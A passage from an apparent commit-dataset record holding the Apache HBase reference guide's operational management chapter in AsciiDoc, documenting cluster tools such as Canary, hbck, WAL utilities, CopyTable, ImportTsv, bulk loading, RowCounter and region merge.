process.\n\n\n\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"29c46c4834a3f96e9fca33cb16bc7f3748fcd60c","subject":"HBASE-15985 clarify promises about edits from replication in ref guide","message":"HBASE-15985 clarify promises about edits from replication in ref guide\n\nSigned-off-by: Andrew Purtell <b91237ce35d325aea9eacb2c17af89139c6c9289@apache.org>\n","repos":"Eshcar\/hbase,apurtell\/hbase,vincentpoon\/hbase,apurtell\/hbase,HubSpot\/hbase,ChinmaySKulkarni\/hbase,HubSpot\/hbase,gustavoanatoly\/hbase,Apache9\/hbase,mahak\/hbase,bijugs\/hbase,ndimiduk\/hbase,ultratendency\/hbase,HubSpot\/hbase,JingchengDu\/hbase,ndimiduk\/hbase,vincentpoon\/hbase,bijugs\/hbase,apurtell\/hbase,ultratendency\/hbase,francisliu\/hbase,bijugs\/hbase,HubSpot\/hbase,JingchengDu\/hbase,mahak\/hbase,bijugs\/hbase,francisliu\/hbase,ndimiduk\/hbase,ultratendency\/hbase,ChinmaySKulkarni\/hbase,ultratendency\/hbase,francisliu\/hbase,ndimiduk\/hbase,HubSpot\/hbase,bijugs\/hbase,Eshcar\/hbase,Eshcar\/hbase,JingchengDu\/hbase,mahak\/hbase,ndimiduk\/hbase,apurtell\/hbase,ultratendency\/hbase,ChinmaySKulkarni\/hbase,bijugs\/hbase,vincentpoon\/hbase,gustavoanatoly\/hbase,francisliu\/hbase,francisliu\/hbase,gustavoanatoly\/hbase,Eshcar\/hbase,gustavoanatoly\/hbase,gustavoanatoly\/hbase,ultratendency\/hbase,Apache9\/hbase,HubSpot\/hbase,apurtell\/hbase,Apache9\/hbase,francisliu\/hbase,apurtell\/hbase,vincentpoon\/hbase,mahak\/hbase,francisliu\/hbase,bijugs\/hbase,ndimiduk\/hbase,JingchengDu\/hbase,vincentpoon\/hbase,ndimiduk\/hbase,Apache9\/hbase,ultratendency\/hbase,HubSpot\/hbase,apurtell\/hbase,Eshcar\/hbase,apurtell\/hbase,gustavoanatoly\/hbase,mahak\/hbase,gustavoanatoly\/hbase,ndimiduk\/hbase,ChinmaySKulkarni\/hbase,bijugs\/hbase,bijugs\/hbase,mahak\/hbase,vincentpoon\/hbase,gustavoanatoly\/hbase,Eshcar\/hbase,francisliu\/hbase,vincentpoon\/hbase,ChinmaySKulkarni\/hbase,Eshcar\/hbase,ndimiduk\/hbase,JingchengDu\/hbase,vincentpoon\/hbase,ChinmaySKulkarni\/hbase,ultratendency\/hbase,ultratendency\/hbase,ultratendency\/hbase,ChinmaySKulkarni\/hbase,gustavoanatoly\/hbase,ChinmaySKulkarni\/hbase,HubSpot\/hbase,gustavoanatoly\/hbase,mahak\/hbase,mahak\/hbase,HubSpot\/hbase,Apache9\/hbase,apurtell\/hbase,Apache9\/hbase,Eshcar\/hbase,Eshcar\/hbase,Apache9\/hbase,apurtell\/hbase,ndimiduk\/hbase,ChinmaySKulkarni\/hbase,mahak\/hbase,Eshcar\/hbase,vincentpoon\/hbase,ChinmaySKulkarni\/hbase,JingchengDu\/hbase,francisliu\/hbase,Apache9\/hbase,JingchengDu\/hbase,bijugs\/hbase,francisliu\/hbase,Apache9\/hbase,JingchengDu\/hbase,JingchengDu\/hbase,HubSpot\/hbase,mahak\/hbase,JingchengDu\/hbase,Apache9\/hbase,vincentpoon\/hbase","old_file":"src\/main\/asciidoc\/_chapters\/ops_mgt.adoc","new_file":"src\/main\/asciidoc\/_chapters\/ops_mgt.adoc","new_contents":"\/\/\/\/\n\/**\n *\n * Licensed to the Apache Software Foundation (ASF) under one\n * or more contributor license agreements. See the NOTICE file\n * distributed with this work for additional information\n * regarding copyright ownership. The ASF licenses this file\n * to you under the Apache License, Version 2.0 (the\n * \"License\"); you may not use this file except in compliance\n * with the License. You may obtain a copy of the License at\n *\n * http:\/\/www.apache.org\/licenses\/LICENSE-2.0\n *\n * Unless required by applicable law or agreed to in writing, software\n * distributed under the License is distributed on an \"AS IS\" BASIS,\n * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n * See the License for the specific language governing permissions and\n * limitations under the License.\n *\/\n\/\/\/\/\n\n[[ops_mgt]]\n= Apache HBase Operational Management\n:doctype: book\n:numbered:\n:toc: left\n:icons: font\n:experimental:\n\nThis chapter will cover operational tools and practices required of a running Apache HBase cluster.\nThe subject of operations is related to the topics of <<trouble>>, <<performance>>, and <<configuration>> but is a distinct topic in itself.\n\n[[tools]]\n== HBase Tools and Utilities\n\nHBase provides several tools for administration, analysis, and debugging of your cluster.\nThe entry-point to most of these tools is the _bin\/hbase_ command, though some tools are available in the _dev-support\/_ directory.\n\nTo see usage instructions for _bin\/hbase_ command, run it with no arguments, or with the `-h` argument.\nThese are the usage instructions for HBase 0.98.x.\nSome commands, such as `version`, `pe`, `ltt`, `clean`, are not available in previous versions.\n\n----\n$ bin\/hbase\nUsage: hbase [<options>] <command> [<args>]\nOptions:\n --config DIR Configuration direction to use. Default: .\/conf\n --hosts HOSTS Override the list in 'regionservers' file\n\nCommands:\nSome commands take arguments. Pass no args or -h for usage.\n shell Run the HBase shell\n hbck Run the hbase 'fsck' tool\n wal Write-ahead-log analyzer\n hfile Store file analyzer\n zkcli Run the ZooKeeper shell\n upgrade Upgrade hbase\n master Run an HBase HMaster node\n regionserver Run an HBase HRegionServer node\n zookeeper Run a ZooKeeper server\n rest Run an HBase REST server\n thrift Run the HBase Thrift server\n thrift2 Run the HBase Thrift2 server\n clean Run the HBase clean up script\n classpath Dump hbase CLASSPATH\n mapredcp Dump CLASSPATH entries required by mapreduce\n pe Run PerformanceEvaluation\n ltt Run LoadTestTool\n version Print the version\n CLASSNAME Run the class named CLASSNAME\n----\n\nSome of the tools and utilities below are Java classes which are passed directly to the _bin\/hbase_ command, as referred to in the last line of the usage instructions.\nOthers, such as `hbase shell` (<<shell>>), `hbase upgrade` (<<upgrading>>), and `hbase thrift` (<<thrift>>), are documented elsewhere in this guide.\n\n=== Canary\n\nThere is a Canary class can help users to canary-test the HBase cluster status, with every column-family for every regions or RegionServer's granularity.\nTo see the usage, use the `--help` parameter.\n\n----\n$ ${HBASE_HOME}\/bin\/hbase canary -help\n\nUsage: bin\/hbase org.apache.hadoop.hbase.tool.Canary [opts] [table1 [table2]...] | [regionserver1 [regionserver2]..]\n where [opts] are:\n -help Show this help and exit.\n -regionserver replace the table argument to regionserver,\n which means to enable regionserver mode\n -daemon Continuous check at defined intervals.\n -interval <N> Interval between checks (sec)\n -e Use region\/regionserver as regular expression\n which means the region\/regionserver is regular expression pattern\n -f <B> stop whole program if first error occurs, default is true\n -t <N> timeout for a check, default is 600000 (milliseconds)\n -writeSniffing enable the write sniffing in canary\n -treatFailureAsError treats read \/ write failure as error\n -writeTable The table used for write sniffing. Default is hbase:canary\n -D<configProperty>=<value> assigning or override the configuration params\n----\n\nThis tool will return non zero error codes to user for collaborating with other monitoring tools, such as Nagios.\nThe error code definitions are:\n\n[source,java]\n----\nprivate static final int USAGE_EXIT_CODE = 1;\nprivate static final int INIT_ERROR_EXIT_CODE = 2;\nprivate static final int TIMEOUT_ERROR_EXIT_CODE = 3;\nprivate static final int ERROR_EXIT_CODE = 4;\n----\n\nHere are some examples based on the following given case.\nThere are two Table objects called test-01 and test-02, they have two column family cf1 and cf2 respectively, and deployed on the 3 RegionServers.\nsee following table.\n\n[cols=\"1,1,1\", options=\"header\"]\n|===\n| RegionServer\n| test-01\n| test-02\n| rs1 | r1 | r2\n| rs2 | r2 |\n| rs3 | r2 | r1\n|===\n\nFollowing are some examples based on the previous given case.\n\n==== Canary test for every column family (store) of every region of every table\n\n----\n$ ${HBASE_HOME}\/bin\/hbase canary\n\n3\/12\/09 03:26:32 INFO tool.Canary: read from region test-01,,1386230156732.0e3c7d77ffb6361ea1b996ac1042ca9a. column family cf1 in 2ms\n13\/12\/09 03:26:32 INFO tool.Canary: read from region test-01,,1386230156732.0e3c7d77ffb6361ea1b996ac1042ca9a. column family cf2 in 2ms\n13\/12\/09 03:26:32 INFO tool.Canary: read from region test-01,0004883,1386230156732.87b55e03dfeade00f441125159f8ca87. column family cf1 in 4ms\n13\/12\/09 03:26:32 INFO tool.Canary: read from region test-01,0004883,1386230156732.87b55e03dfeade00f441125159f8ca87. column family cf2 in 1ms\n...\n13\/12\/09 03:26:32 INFO tool.Canary: read from region test-02,,1386559511167.aa2951a86289281beee480f107bb36ee. column family cf1 in 5ms\n13\/12\/09 03:26:32 INFO tool.Canary: read from region test-02,,1386559511167.aa2951a86289281beee480f107bb36ee. column family cf2 in 3ms\n13\/12\/09 03:26:32 INFO tool.Canary: read from region test-02,0004883,1386559511167.cbda32d5e2e276520712d84eaaa29d84. column family cf1 in 31ms\n13\/12\/09 03:26:32 INFO tool.Canary: read from region test-02,0004883,1386559511167.cbda32d5e2e276520712d84eaaa29d84. column family cf2 in 8ms\n----\n\nSo you can see, table test-01 has two regions and two column families, so the Canary tool will pick 4 small piece of data from 4 (2 region * 2 store) different stores.\nThis is a default behavior of the this tool does.\n\n==== Canary test for every column family (store) of every region of specific table(s)\n\nYou can also test one or more specific tables.\n\n----\n$ ${HBASE_HOME}\/bin\/hbase canary test-01 test-02\n----\n\n==== Canary test with RegionServer granularity\n\nThis will pick one small piece of data from each RegionServer, and can also put your RegionServer name as input options for canary-test specific RegionServer.\n\n----\n$ ${HBASE_HOME}\/bin\/hbase canary -regionserver\n\n13\/12\/09 06:05:17 INFO tool.Canary: Read from table:test-01 on region server:rs2 in 72ms\n13\/12\/09 06:05:17 INFO tool.Canary: Read from table:test-02 on region server:rs3 in 34ms\n13\/12\/09 06:05:17 INFO tool.Canary: Read from table:test-01 on region server:rs1 in 56ms\n----\n\n==== Canary test with regular expression pattern\n\nThis will test both table test-01 and test-02.\n\n----\n$ ${HBASE_HOME}\/bin\/hbase canary -e test-0[1-2]\n----\n\n==== Run canary test as daemon mode\n\nRun repeatedly with interval defined in option `-interval` whose default value is 6 seconds.\nThis daemon will stop itself and return non-zero error code if any error occurs, due to the default value of option -f is true.\n\n----\n$ ${HBASE_HOME}\/bin\/hbase canary -daemon\n----\n\nRun repeatedly with internal 5 seconds and will not stop itself even if errors occur in the test.\n\n----\n$ ${HBASE_HOME}\/bin\/hbase canary -daemon -interval 50000 -f false\n----\n\n==== Force timeout if canary test stuck\n\nIn some cases the request is stuck and no response is sent back to the client. This can happen with dead RegionServers which the master has not yet noticed.\nBecause of this we provide a timeout option to kill the canary test and return a non-zero error code.\nThis run sets the timeout value to 60 seconds, the default value is 600 seconds.\n\n----\n$ ${HBASE_HOME}\/bin\/hbase canary -t 600000\n----\n\n==== Enable write sniffing in canary\n\nBy default, the canary tool only check the read operations, it's hard to find the problem in the\nwrite path. To enable the write sniffing, you can run canary with the `-writeSniffing` option.\nWhen the write sniffing is enabled, the canary tool will create an hbase table and make sure the\nregions of the table distributed on all region servers. In each sniffing period, the canary will\ntry to put data to these regions to check the write availability of each region server.\n----\n$ ${HBASE_HOME}\/bin\/hbase canary -writeSniffing\n----\n\nThe default write table is `hbase:canary` and can be specified by the option `-writeTable`.\n----\n$ ${HBASE_HOME}\/bin\/hbase canary -writeSniffing -writeTable ns:canary\n----\n\nThe default value size of each put is 10 bytes and you can set it by the config key:\n`hbase.canary.write.value.size`.\n\n==== Treat read \/ write failure as error\n\nBy default, the canary tool only logs read failure, due to e.g. RetriesExhaustedException,\nwhile returning normal exit code. To treat read \/ write failure as error, you can run canary\nwith the `-treatFailureAsError` option. When enabled, read \/ write failure would result in error\nexit code.\n----\n$ ${HBASE_HOME}\/bin\/hbase canary --treatFailureAsError\n----\n\n==== Running Canary in a Kerberos-enabled Cluster\n\nTo run Canary in a Kerberos-enabled cluster, configure the following two properties in _hbase-site.xml_:\n\n* `hbase.client.keytab.file`\n* `hbase.client.kerberos.principal`\n\nKerberos credentials are refreshed every 30 seconds when Canary runs in daemon mode.\n\nTo configure the DNS interface for the client, configure the following optional properties in _hbase-site.xml_.\n\n* `hbase.client.dns.interface`\n* `hbase.client.dns.nameserver`\n\n.Canary in a Kerberos-Enabled Cluster\n====\nThis example shows each of the properties with valid values.\n\n[source,xml]\n----\n<property>\n <name>hbase.client.kerberos.principal<\/name>\n <value>hbase\/_HOST@YOUR-REALM.COM<\/value>\n<\/property>\n<property>\n <name>hbase.client.keytab.file<\/name>\n <value>\/etc\/hbase\/conf\/keytab.krb5<\/value>\n<\/property>\n<!-- optional params -->\nproperty>\n <name>hbase.client.dns.interface<\/name>\n <value>default<\/value>\n<\/property>\n<property>\n <name>hbase.client.dns.nameserver<\/name>\n <value>default<\/value>\n<\/property>\n----\n====\n\n[[health.check]]\n=== Health Checker\n\nYou can configure HBase to run a script periodically and if it fails N times (configurable), have the server exit.\nSee _HBASE-7351 Periodic health check script_ for configurations and detail.\n\n=== Driver\n\nSeveral frequently-accessed utilities are provided as `Driver` classes, and executed by the _bin\/hbase_ command.\nThese utilities represent MapReduce jobs which run on your cluster.\nThey are run in the following way, replacing _UtilityName_ with the utility you want to run.\nThis command assumes you have set the environment variable `HBASE_HOME` to the directory where HBase is unpacked on your server.\n\n----\n\n${HBASE_HOME}\/bin\/hbase org.apache.hadoop.hbase.mapreduce.UtilityName\n----\n\nThe following utilities are available:\n\n`LoadIncrementalHFiles`::\n Complete a bulk data load.\n\n`CopyTable`::\n Export a table from the local cluster to a peer cluster.\n\n`Export`::\n Write table data to HDFS.\n\n`Import`::\n Import data written by a previous `Export` operation.\n\n`ImportTsv`::\n Import data in TSV format.\n\n`RowCounter`::\n Count rows in an HBase table.\n\n`CellCounter`::\n Count cells in an HBase table.\n\n`replication.VerifyReplication`::\n Compare the data from tables in two different clusters.\n WARNING: It doesn't work for incrementColumnValues'd cells since the timestamp is changed.\n Note that this command is in a different package than the others.\n\nEach command except `RowCounter` and `CellCounter` accept a single `--help` argument to print usage instructions.\n\n[[hbck]]\n=== HBase `hbck`\n\nTo run `hbck` against your HBase cluster run `$.\/bin\/hbase hbck`. At the end of the command's output it prints `OK` or `INCONSISTENCY`.\nIf your cluster reports inconsistencies, pass `-details` to see more detail emitted.\nIf inconsistencies, run `hbck` a few times because the inconsistency may be transient (e.g. cluster is starting up or a region is splitting).\n Passing `-fix` may correct the inconsistency (This is an experimental feature).\n\nFor more information, see <<hbck.in.depth>>.\n\n[[hfile_tool2]]\n=== HFile Tool\n\nSee <<hfile_tool>>.\n\n=== WAL Tools\n\n[[hlog_tool]]\n==== `FSHLog` tool\n\nThe main method on `FSHLog` offers manual split and dump facilities.\nPass it WALs or the product of a split, the content of the _recovered.edits_.\ndirectory.\n\nYou can get a textual dump of a WAL file content by doing the following:\n\n----\n $ .\/bin\/hbase org.apache.hadoop.hbase.regionserver.wal.FSHLog --dump hdfs:\/\/example.org:8020\/hbase\/.logs\/example.org,60020,1283516293161\/10.10.21.10%3A60020.1283973724012\n----\n\nThe return code will be non-zero if there are any issues with the file so you can test wholesomeness of file by redirecting `STDOUT` to `\/dev\/null` and testing the program return.\n\nSimilarly you can force a split of a log file directory by doing:\n\n----\n $ .\/bin\/hbase org.apache.hadoop.hbase.regionserver.wal.FSHLog --split hdfs:\/\/example.org:8020\/hbase\/.logs\/example.org,60020,1283516293161\/\n----\n\n[[hlog_tool.prettyprint]]\n===== WAL Pretty Printer\n\nThe WAL Pretty Printer is a tool with configurable options to print the contents of a WAL.\nYou can invoke it via the HBase cli with the 'wal' command.\n\n----\n $ .\/bin\/hbase wal hdfs:\/\/example.org:8020\/hbase\/.logs\/example.org,60020,1283516293161\/10.10.21.10%3A60020.1283973724012\n----\n\n.WAL Printing in older versions of HBase\n[NOTE]\n====\nPrior to version 2.0, the WAL Pretty Printer was called the `HLogPrettyPrinter`, after an internal name for HBase's write ahead log.\nIn those versions, you can print the contents of a WAL using the same configuration as above, but with the 'hlog' command.\n\n----\n $ .\/bin\/hbase hlog hdfs:\/\/example.org:8020\/hbase\/.logs\/example.org,60020,1283516293161\/10.10.21.10%3A60020.1283973724012\n----\n====\n\n[[compression.tool]]\n=== Compression Tool\n\nSee <<compression.test,compression.test>>.\n\n[[copy.table]]\n=== CopyTable\n\nCopyTable is a utility that can copy part or of all of a table, either to the same cluster or another cluster.\nThe target table must first exist.\nThe usage is as follows:\n\n----\n\n$ .\/bin\/hbase org.apache.hadoop.hbase.mapreduce.CopyTable --help\n\/bin\/hbase org.apache.hadoop.hbase.mapreduce.CopyTable --help\nUsage: CopyTable [general options] [--starttime=X] [--endtime=Y] [--new.name=NEW] [--peer.adr=ADR] <tablename>\n\nOptions:\n rs.class hbase.regionserver.class of the peer cluster,\n specify if different from current cluster\n rs.impl hbase.regionserver.impl of the peer cluster,\n startrow the start row\n stoprow the stop row\n starttime beginning of the time range (unixtime in millis)\n without endtime means from starttime to forever\n endtime end of the time range. Ignored if no starttime specified.\n versions number of cell versions to copy\n new.name new table's name\n peer.adr Address of the peer cluster given in the format\n hbase.zookeeer.quorum:hbase.zookeeper.client.port:zookeeper.znode.parent\n families comma-separated list of families to copy\n To copy from cf1 to cf2, give sourceCfName:destCfName.\n To keep the same name, just give \"cfName\"\n all.cells also copy delete markers and deleted cells\n\nArgs:\n tablename Name of the table to copy\n\nExamples:\n To copy 'TestTable' to a cluster that uses replication for a 1 hour window:\n $ bin\/hbase org.apache.hadoop.hbase.mapreduce.CopyTable --starttime=1265875194289 --endtime=1265878794289 --peer.adr=server1,server2,server3:2181:\/hbase --families=myOldCf:myNewCf,cf2,cf3 TestTable\n\nFor performance consider the following general options:\n It is recommended that you set the following to >=100. A higher value uses more memory but\n decreases the round trip time to the server and may increase performance.\n -Dhbase.client.scanner.caching=100\n The following should always be set to false, to prevent writing data twice, which may produce\n inaccurate results.\n -Dmapred.map.tasks.speculative.execution=false\n----\n\n.Scanner Caching\n[NOTE]\n====\nCaching for the input Scan is configured via `hbase.client.scanner.caching` in the job configuration.\n====\n\n.Versions\n[NOTE]\n====\nBy default, CopyTable utility only copies the latest version of row cells unless `--versions=n` is explicitly specified in the command.\n====\n\nSee Jonathan Hsieh's link:http:\/\/www.cloudera.com\/blog\/2012\/06\/online-hbase-backups-with-copytable-2\/[Online\n HBase Backups with CopyTable] blog post for more on `CopyTable`.\n\n[[export]]\n=== Export\n\nExport is a utility that will dump the contents of table to HDFS in a sequence file.\nInvoke via:\n\n----\n$ bin\/hbase org.apache.hadoop.hbase.mapreduce.Export <tablename> <outputdir> [<versions> [<starttime> [<endtime>]]]\n----\n\nNOTE: To see usage instructions, run the command with no options. Available options include\nspecifying column families and applying filters during the export.\n\nBy default, the `Export` tool only exports the newest version of a given cell, regardless of the number of versions stored. To export more than one version, replace *_<versions>_* with the desired number of versions.\n\nNote: caching for the input Scan is configured via `hbase.client.scanner.caching` in the job configuration.\n\n[[import]]\n=== Import\n\nImport is a utility that will load data that has been exported back into HBase.\nInvoke via:\n\n----\n$ bin\/hbase org.apache.hadoop.hbase.mapreduce.Import <tablename> <inputdir>\n----\n\nNOTE: To see usage instructions, run the command with no options.\n\nTo import 0.94 exported files in a 0.96 cluster or onwards, you need to set system property \"hbase.import.version\" when running the import command as below:\n\n----\n$ bin\/hbase -Dhbase.import.version=0.94 org.apache.hadoop.hbase.mapreduce.Import <tablename> <inputdir>\n----\n\n[[importtsv]]\n=== ImportTsv\n\nImportTsv is a utility that will load data in TSV format into HBase.\nIt has two distinct usages: loading data from TSV format in HDFS into HBase via Puts, and preparing StoreFiles to be loaded via the `completebulkload`.\n\nTo load data via Puts (i.e., non-bulk loading):\n\n----\n$ bin\/hbase org.apache.hadoop.hbase.mapreduce.ImportTsv -Dimporttsv.columns=a,b,c <tablename> <hdfs-inputdir>\n----\n\nTo generate StoreFiles for bulk-loading:\n\n[source,bourne]\n----\n$ bin\/hbase org.apache.hadoop.hbase.mapreduce.ImportTsv -Dimporttsv.columns=a,b,c -Dimporttsv.bulk.output=hdfs:\/\/storefile-outputdir <tablename> <hdfs-data-inputdir>\n----\n\nThese generated StoreFiles can be loaded into HBase via <<completebulkload,completebulkload>>.\n\n[[importtsv.options]]\n==== ImportTsv Options\n\nRunning `ImportTsv` with no arguments prints brief usage information:\n\n----\n\nUsage: importtsv -Dimporttsv.columns=a,b,c <tablename> <inputdir>\n\nImports the given input directory of TSV data into the specified table.\n\nThe column names of the TSV data must be specified using the -Dimporttsv.columns\noption. This option takes the form of comma-separated column names, where each\ncolumn name is either a simple column family, or a columnfamily:qualifier. The special\ncolumn name HBASE_ROW_KEY is used to designate that this column should be used\nas the row key for each imported record. You must specify exactly one column\nto be the row key, and you must specify a column name for every column that exists in the\ninput data.\n\nBy default importtsv will load data directly into HBase. To instead generate\nHFiles of data to prepare for a bulk data load, pass the option:\n -Dimporttsv.bulk.output=\/path\/for\/output\n Note: the target table will be created with default column family descriptors if it does not already exist.\n\nOther options that may be specified with -D include:\n -Dimporttsv.skip.bad.lines=false - fail if encountering an invalid line\n '-Dimporttsv.separator=|' - eg separate on pipes instead of tabs\n -Dimporttsv.timestamp=currentTimeAsLong - use the specified timestamp for the import\n -Dimporttsv.mapper.class=my.Mapper - A user-defined Mapper to use instead of org.apache.hadoop.hbase.mapreduce.TsvImporterMapper\n----\n\n[[importtsv.example]]\n==== ImportTsv Example\n\nFor example, assume that we are loading data into a table called 'datatsv' with a ColumnFamily called 'd' with two columns \"c1\" and \"c2\".\n\nAssume that an input file exists as follows:\n----\n\nrow1\tc1\tc2\nrow2\tc1\tc2\nrow3\tc1\tc2\nrow4\tc1\tc2\nrow5\tc1\tc2\nrow6\tc1\tc2\nrow7\tc1\tc2\nrow8\tc1\tc2\nrow9\tc1\tc2\nrow10\tc1\tc2\n----\n\nFor ImportTsv to use this input file, the command line needs to look like this:\n\n----\n\n HADOOP_CLASSPATH=`${HBASE_HOME}\/bin\/hbase classpath` ${HADOOP_HOME}\/bin\/hadoop jar ${HBASE_HOME}\/hbase-server-VERSION.jar importtsv -Dimporttsv.columns=HBASE_ROW_KEY,d:c1,d:c2 -Dimporttsv.bulk.output=hdfs:\/\/storefileoutput datatsv hdfs:\/\/inputfile\n----\n\n\\... and in this example the first column is the rowkey, which is why the HBASE_ROW_KEY is used.\nThe second and third columns in the file will be imported as \"d:c1\" and \"d:c2\", respectively.\n\n[[importtsv.warning]]\n==== ImportTsv Warning\n\nIf you have preparing a lot of data for bulk loading, make sure the target HBase table is pre-split appropriately.\n\n[[importtsv.also]]\n==== See Also\n\nFor more information about bulk-loading HFiles into HBase, see <<arch.bulk.load,arch.bulk.load>>\n\n[[completebulkload]]\n=== CompleteBulkLoad\n\nThe `completebulkload` utility will move generated StoreFiles into an HBase table.\nThis utility is often used in conjunction with output from <<importtsv,importtsv>>.\n\nThere are two ways to invoke this utility, with explicit classname and via the driver:\n\n.Explicit Classname\n----\n$ bin\/hbase org.apache.hadoop.hbase.mapreduce.LoadIncrementalHFiles <hdfs:\/\/storefileoutput> <tablename>\n----\n\n.Driver\n----\nHADOOP_CLASSPATH=`${HBASE_HOME}\/bin\/hbase classpath` ${HADOOP_HOME}\/bin\/hadoop jar ${HBASE_HOME}\/hbase-server-VERSION.jar completebulkload <hdfs:\/\/storefileoutput> <tablename>\n----\n\n[[completebulkload.warning]]\n==== CompleteBulkLoad Warning\n\nData generated via MapReduce is often created with file permissions that are not compatible with the running HBase process.\nAssuming you're running HDFS with permissions enabled, those permissions will need to be updated before you run CompleteBulkLoad.\n\nFor more information about bulk-loading HFiles into HBase, see <<arch.bulk.load,arch.bulk.load>>.\n\n=== WALPlayer\n\nWALPlayer is a utility to replay WAL files into HBase.\n\nThe WAL can be replayed for a set of tables or all tables, and a timerange can be provided (in milliseconds). The WAL is filtered to this set of tables.\nThe output can optionally be mapped to another set of tables.\n\nWALPlayer can also generate HFiles for later bulk importing, in that case only a single table and no mapping can be specified.\n\nInvoke via:\n\n----\n$ bin\/hbase org.apache.hadoop.hbase.mapreduce.WALPlayer [options] <wal inputdir> <tables> [<tableMappings>]>\n----\n\nFor example:\n\n----\n$ bin\/hbase org.apache.hadoop.hbase.mapreduce.WALPlayer \/backuplogdir oldTable1,oldTable2 newTable1,newTable2\n----\n\nWALPlayer, by default, runs as a mapreduce job.\nTo NOT run WALPlayer as a mapreduce job on your cluster, force it to run all in the local process by adding the flags `-Dmapreduce.jobtracker.address=local` on the command line.\n\n[[rowcounter]]\n=== RowCounter and CellCounter\n\nlink:http:\/\/hbase.apache.org\/apidocs\/org\/apache\/hadoop\/hbase\/mapreduce\/RowCounter.html[RowCounter] is a mapreduce job to count all the rows of a table.\nThis is a good utility to use as a sanity check to ensure that HBase can read all the blocks of a table if there are any concerns of metadata inconsistency.\nIt will run the mapreduce all in a single process but it will run faster if you have a MapReduce cluster in place for it to exploit. It is also possible to limit\nthe time range of data to be scanned by using the `--starttime=[starttime]` and `--endtime=[endtime]` flags.\n\n----\n$ bin\/hbase org.apache.hadoop.hbase.mapreduce.RowCounter <tablename> [<column1> <column2>...]\n----\n\nRowCounter only counts one version per cell.\n\nNote: caching for the input Scan is configured via `hbase.client.scanner.caching` in the job configuration.\n\nHBase ships another diagnostic mapreduce job called link:http:\/\/hbase.apache.org\/apidocs\/org\/apache\/hadoop\/hbase\/mapreduce\/CellCounter.html[CellCounter].\nLike RowCounter, it gathers more fine-grained statistics about your table.\nThe statistics gathered by RowCounter are more fine-grained and include:\n\n* Total number of rows in the table.\n* Total number of CFs across all rows.\n* Total qualifiers across all rows.\n* Total occurrence of each CF.\n* Total occurrence of each qualifier.\n* Total number of versions of each qualifier.\n\nThe program allows you to limit the scope of the run.\nProvide a row regex or prefix to limit the rows to analyze.\nSpecify a time range to scan the table by using the `--starttime=[starttime]` and `--endtime=[endtime]` flags.\n\nUse `hbase.mapreduce.scan.column.family` to specify scanning a single column family.\n\n----\n$ bin\/hbase org.apache.hadoop.hbase.mapreduce.CellCounter <tablename> <outputDir> [regex or prefix]\n----\n\nNote: just like RowCounter, caching for the input Scan is configured via `hbase.client.scanner.caching` in the job configuration.\n\n=== mlockall\n\nIt is possible to optionally pin your servers in physical memory making them less likely to be swapped out in oversubscribed environments by having the servers call link:http:\/\/linux.die.net\/man\/2\/mlockall[mlockall] on startup.\nSee link:https:\/\/issues.apache.org\/jira\/browse\/HBASE-4391[HBASE-4391 Add ability to\n start RS as root and call mlockall] for how to build the optional library and have it run on startup.\n\n[[compaction.tool]]\n=== Offline Compaction Tool\n\nSee the usage for the\nlink:http:\/\/hbase.apache.org\/devapidocs\/org\/apache\/hadoop\/hbase\/regionserver\/CompactionTool.html[CompactionTool].\nRun it like:\n\n[source, bash]\n----\n$ .\/bin\/hbase org.apache.hadoop.hbase.regionserver.CompactionTool\n----\n\n=== `hbase clean`\n\nThe `hbase clean` command cleans HBase data from ZooKeeper, HDFS, or both.\nIt is appropriate to use for testing.\nRun it with no options for usage instructions.\nThe `hbase clean` command was introduced in HBase 0.98.\n\n----\n\n$ bin\/hbase clean\nUsage: hbase clean (--cleanZk|--cleanHdfs|--cleanAll)\nOptions:\n --cleanZk cleans hbase related data from zookeeper.\n --cleanHdfs cleans hbase related data from hdfs.\n --cleanAll cleans hbase related data from both zookeeper and hdfs.\n----\n\n=== `hbase pe`\n\nThe `hbase pe` command is a shortcut provided to run the `org.apache.hadoop.hbase.PerformanceEvaluation` tool, which is used for testing.\nThe `hbase pe` command was introduced in HBase 0.98.4.\n\nThe PerformanceEvaluation tool accepts many different options and commands.\nFor usage instructions, run the command with no options.\n\nTo run PerformanceEvaluation prior to HBase 0.98.4, issue the command `hbase org.apache.hadoop.hbase.PerformanceEvaluation`.\n\nThe PerformanceEvaluation tool has received many updates in recent HBase releases, including support for namespaces, support for tags, cell-level ACLs and visibility labels, multiget support for RPC calls, increased sampling sizes, an option to randomly sleep during testing, and ability to \"warm up\" the cluster before testing starts.\n\n=== `hbase ltt`\n\nThe `hbase ltt` command is a shortcut provided to run the `org.apache.hadoop.hbase.util.LoadTestTool` utility, which is used for testing.\nThe `hbase ltt` command was introduced in HBase 0.98.4.\n\nYou must specify either `-write` or `-update-read` as the first option.\nFor general usage instructions, pass the `-h` option.\n\nTo run LoadTestTool prior to HBase 0.98.4, issue the command +hbase\n org.apache.hadoop.hbase.util.LoadTestTool+.\n\nThe LoadTestTool has received many updates in recent HBase releases, including support for namespaces, support for tags, cell-level ACLS and visibility labels, testing security-related features, ability to specify the number of regions per server, tests for multi-get RPC calls, and tests relating to replication.\n\n[[ops.regionmgt]]\n== Region Management\n\n[[ops.regionmgt.majorcompact]]\n=== Major Compaction\n\nMajor compactions can be requested via the HBase shell or link:http:\/\/hbase.apache.org\/apidocs\/org\/apache\/hadoop\/hbase\/client\/Admin.html#majorCompact%28java.lang.String%29[Admin.majorCompact].\n\nNote: major compactions do NOT do region merges.\nSee <<compaction,compaction>> for more information about compactions.\n\n[[ops.regionmgt.merge]]\n=== Merge\n\nMerge is a utility that can merge adjoining regions in the same table (see org.apache.hadoop.hbase.util.Merge).\n\n[source,bourne]\n----\n$ bin\/hbase org.apache.hadoop.hbase.util.Merge <tablename> <region1> <region2>\n----\n\nIf you feel you have too many regions and want to consolidate them, Merge is the utility you need.\nMerge must run be done when the cluster is down.\nSee the link:http:\/\/ofps.oreilly.com\/titles\/9781449396107\/performance.html[O'Reilly HBase\n Book] for an example of usage.\n\nYou will need to pass 3 parameters to this application.\nThe first one is the table name.\nThe second one is the fully qualified name of the first region to merge, like \"table_name,\\x0A,1342956111995.7cef47f192318ba7ccc75b1bbf27a82b.\". The third one is the fully qualified name for the second region to merge.\n\nAdditionally, there is a Ruby script attached to link:https:\/\/issues.apache.org\/jira\/browse\/HBASE-1621[HBASE-1621] for region merging.\n\n[[node.management]]\n== Node Management\n\n[[decommission]]\n=== Node Decommission\n\nYou can stop an individual RegionServer by running the following script 